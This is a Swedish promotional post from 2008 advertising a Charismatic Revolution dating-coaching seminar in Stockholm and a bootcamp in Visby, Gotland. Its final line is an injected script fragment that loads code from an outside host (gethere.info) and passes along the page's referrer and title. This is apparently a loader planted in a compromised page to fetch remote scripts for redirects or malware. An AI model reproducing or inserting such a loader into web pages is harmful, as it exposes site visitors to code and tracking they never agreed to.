Vänner idag vill två belysa två av sommarens största C-R event.
seminarbanner1 Sommar 2008 med C R
7 juni 2008, Stockholm, 11.00 – 20.00

Warm Alpha Seminar
Den 7:e juni är det dags igen! Fyra av Charismatic Revolutions instruktörer går ihop för att under en dag dela med sig av sina bästa hemligheter om mindsets och beteenden som attraherar kvinnor och återigen sätta ihop det seminarium som gjorde succé i april. Vi kommer att gå in på djupet inom koncept som glow och alfabeteende, samt ge dig svar på frågan: “Vad ska jag prata om?”.

Det finns bara ett sätt att få kvinnan du drömmer om – du måste bli mannen hon drömmer om! Genom att tillämpa de attraktiva beteenden vi lär dig kommer du direkt att märka hur din dragningskraft för kvinnor i din närhet ökar. Tänk dig att kunna attrahera kvinnor och dra in dem i DIN verklighet! Det här seminariet är fokuserat på hur Du ska gå till väga på ett praktiskt plan för att bli en mer naturligt attraktiv och solid man, utan att för den skull förställa dig eller spela någon du inte är.

För endast 950 kronor får du en hel dags intensiv seminarieträning av våra instruktörer, som dyker djupare in i ämnena än du någonsin hört eller sett tidigare.
Detta är sista veckan för anmälan så se till att boka de resterande platser som kvar.

Läs mer om detta HÄR!
visbybanner1 Sommar 2008 med C R

Summer of Love Bootcamp – Visby, Gotland
Tisdag 1 Juli – Fredag 4 Juli
Charismatic Revolution invaderar Gotland!

I sommar tar vi oss an den mest extrema CR-upplevelsen hittills! Under mer än tre dygn kommer vi att ge sju utvalda personer en oförglömlig upplevelse och en ovärderlig början på den bästa sommaren någonsin!

Sju utvalda personer kommer under mer än tre dygn att förändra sitt liv för alltid när de bor med, lär av och umgås med våra instruktörer. Kursen kommer att innehålla allt som vår ”vanliga” bootcamp och mycket mer! Speciellt innehåll för det här unika tillfället är:

* Mer än två heldagars teori, diskussioner och övningar.
* Utgång med instruktörerna TRE kvällar på de hetaste nattklubbarna!
* Alla huvudinstruktörer plus hjälpinstruktörer på sju deltagare!
* Fyra dagars boende tillsammans med instruktörerna i Visby!
* En hel dag med Day Game, praktik på dagtid utanför krogmiljön!

Läs mer om detta HÄR

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;